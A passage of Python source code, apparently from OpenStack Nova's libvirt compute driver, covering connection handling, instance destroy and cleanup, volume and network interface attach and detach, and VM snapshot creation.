self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _do_quality_warnings(self):
"""Warn about untested driver configurations.
This will log a warning message about untested driver or host arch
configurations to indicate to administrators that the quality is
unknown. Currently, only qemu or kvm on intel 32- or 64-bit systems
is tested upstream.
"""
caps = self._get_host_capabilities()
arch = caps.host.cpu.arch
if (CONF.libvirt.virt_type not in ('qemu', 'kvm') or
arch not in ('i686', 'x86_64')):
LOG.warn(_LW('The libvirt driver is not tested on '
'%(type)s/%(arch)s by the OpenStack project and '
'thus its quality can not be ensured. For more '
'information, see: https://wiki.openstack.org/wiki/'
'HypervisorSupportMatrix'),
{'type': CONF.libvirt.virt_type, 'arch': arch})
def init_host(self, host):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._do_quality_warnings()
# Stop libguestfs using KVM unless we're also configured
# to use this. This solves problem where people need to
# stop Nova use of KVM because nested-virt is broken
if CONF.libvirt.virt_type != "kvm":
guestfs.force_tcg()
if not self._has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_LE('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self.uri())
wrapped_conn = None
try:
wrapped_conn = self._connect(self.uri(), self.read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = DISABLE_REASON_UNDEFINED
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
self._set_host_enabled(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
self._skip_list_all_domains = False
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def uri():
if CONF.libvirt.virt_type == 'uml':
uri = CONF.libvirt.connection_uri or 'uml:///system'
elif CONF.libvirt.virt_type == 'xen':
uri = CONF.libvirt.connection_uri or 'xen:///'
elif CONF.libvirt.virt_type == 'lxc':
uri = CONF.libvirt.connection_uri or 'lxc:///'
else:
uri = CONF.libvirt.connection_uri or 'qemu:///system'
return uri
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
LibvirtDriver._connect_auth_cb,
None]
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance.name)
return True
except exception.NovaException:
return False
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self._conn.listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self._conn.numOfDomains() > 0:
for id in self._conn.listDomainsID():
try:
dom = self._lookup_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self._conn.listDefinedDomains():
try:
dom = self._lookup_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def _list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def list_instances(self):
names = []
for dom in self._list_instance_domains(only_running=False):
names.append(dom.name())
return names
def list_instance_uuids(self):
uuids = []
for dom in self._list_instance_domains(only_running=False):
uuids.append(dom.UUIDString())
return uuids
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def _unplug_vifs(self, instance, network_info, ignore_errors):
"""Unplug VIFs from networks."""
for vif in network_info:
try:
self.vif_driver.unplug(instance, vif)
except exception.NovaException:
if not ignore_errors:
raise
def unplug_vifs(self, instance, network_info):
self._unplug_vifs(instance, network_info, False)
def _teardown_container(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
rootfs_dev = instance.system_metadata.get('rootfs_device_name')
disk.teardown_container(container_dir, rootfs_dev)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
# NOTE(GuanQiang): teardown container to avoid resource leak
if CONF.libvirt.virt_type == 'lxc':
self._teardown_container(instance)
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_LW("Cannot destroy instance, operation time "
"out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.warning(_LW("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_LI("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be a endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_LI("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_LI("Going to destroy instance again."),
instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._destroy(instance)
self.cleanup(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags."
" Retrying with undefine", instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_LE('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e}, instance=instance)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
self._undefine_domain(instance)
if destroy_vifs:
self._unplug_vifs(instance, network_info, True)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_LW("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.exception(_LE('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as the
# the soft reboot operation boot it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
try:
self._disconnect_volume(connection_info, disk_dev)
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if destroy_disks:
# Don't block on Volume errors if we're trying to
# delete the instance as we may be patially created
# or deleted
ctxt.reraise = False
LOG.warn(_LW("Ignoring Volume Error on vol %(vol_id)s "
"during delete %(exc)s"),
{'vol_id': vol.get('volume_id'), 'exc': exc},
instance=instance)
if destroy_disks or (
migrate_data and migrate_data.get('is_shared_block_storage',
False)):
self._delete_instance_files(instance)
if destroy_disks:
self._cleanup_lvm(instance)
# NOTE(haomai): destroy volumes if needed
if CONF.libvirt.images_type == 'rbd':
self._cleanup_rbd(instance)
@staticmethod
def _get_rbd_driver():
return rbd.RBDDriver(
pool=CONF.libvirt.images_rbd_pool,
ceph_conf=CONF.libvirt.images_rbd_ceph_conf,
rbd_user=CONF.libvirt.rbd_user)
def _cleanup_rbd(self, instance):
LibvirtDriver._get_rbd_driver().cleanup_volumes(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
lvm.remove_volumes(disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt.images_volume_group:
vg = os.path.join('/dev', CONF.libvirt.images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['uuid']
# TODO(sdague): remove in Juno
def belongs_to_instance_legacy(disk):
# We don't want to leak old disks, but at the same time, we
# don't want to do an unsafe thing. So we will only handle
# the old filter if it's the system default still.
pattern = '%s_' % instance['name']
if disk.startswith(pattern):
if CONF.instance_name_template == 'instance-%08x':
return True
else:
LOG.warn(_LW('Volume %(disk)s possibly unsafe to '
'remove, please clean up manually'),
{'disk': disk})
return False
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = lvm.list_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
# TODO(sdague): remove in Juno
disk_names.extend(
filter(belongs_to_instance_legacy, logical_volumes)
)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug('Could not determine iscsi initiator name',
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide node names',
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide port names',
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
# NOTE(wangpan): we get the pre-grizzly instance path firstly,
# so the backup dir of pre-grizzly instance can
# be deleted correctly with grizzly or later nova.
pre_grizzly_name = libvirt_utils.get_instance_path(instance,
forceold=True)
target = pre_grizzly_name + '_resize'
if not os.path.exists(target):
target = libvirt_utils.get_instance_path(instance) + '_resize'
if os.path.exists(target):
# Deletion can fail over NFS, so retry the deletion as required.
# Set maximum attempt as 5, most test can remove the directory
# for the second time.
utils.execute('rm', '-rf', target, delay_on_retry=True,
attempts=5)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def _connect_volume(self, connection_info, disk_info):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.connect_volume(connection_info, disk_info)
def _disconnect_volume(self, connection_info, disk_dev):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.disconnect_volume(connection_info, disk_dev)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
bdm = {
'device_name': disk_dev,
'disk_bus': disk_bus,
'device_type': device_type}
# Note(cfb): If the volume has a custom block size, check that
# that we are using QEMU/KVM and libvirt >= 0.10.2. The
# presence of a block size is considered mandatory by
# cinder so we fail if we can't honor the request.
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt.virt_type
raise exception.InvalidHypervisorType(msg)
if not self._has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt.virt_type, bdm)
conf = self._connect_volume(connection_info, disk_info)
self._set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self._disconnect_volume(connection_info, disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self._disconnect_volume(connection_info, disk_dev)
def _swap_volume(self, domain, disk_path, new_path, resize_to):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
if resize_to:
# NOTE(alex_xu): domain.blockJobAbort isn't sync call. This
# is bug in libvirt. So we need waiting for the pivot is
# finished. libvirt bug #1119173
while self._wait_for_block_job(domain, disk_path,
wait_for_job_clean=True):
time.sleep(0.5)
domain.blockResize(disk_path, resize_to * units.Gi / units.Ki)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint, resize_to):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(
CONF.libvirt.virt_type, disk_dev),
'type': 'disk',
}
conf = self._connect_volume(new_connection_info, disk_info)
if not conf.source_path:
self._disconnect_volume(new_connection_info, disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path, resize_to)
self._disconnect_volume(old_connection_info, disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except exception.InstanceNotFound:
# NOTE(zhaoqin): If the instance does not exist, _lookup_by_name()
# will throw InstanceNotFound exception. Need to
# disconnect volume under this circumstance.
LOG.warn(_LW("During detach_volume, instance disappeared."))
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_LW("During detach_volume, instance disappeared."))
else:
raise
self._disconnect_volume(connection_info, disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_LE('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(
instance_uuid=instance['uuid'])
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, flavor,
CONF.libvirt.virt_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_LE('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(
instance_uuid=instance['uuid'])
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
base_image_ref = instance['image_ref']
base = compute_utils.get_image_metadata(
context, self._image_api, base_image_ref, instance)
snapshot = self._image_api.get(context, image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.libvirt.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self._has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm" and not source_format == 'rbd':
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
image_type=source_format)
if live_snapshot:
LOG.info(_LI("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_LI("Beginning cold snapshot process"),
instance=instance)
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt.snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE(xqueralt): libvirt needs o+x in the temp directory
os.chmod(tmpdir, 0o701)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_LI("Snapshot extracted, beginning image upload"),
instance=instance)
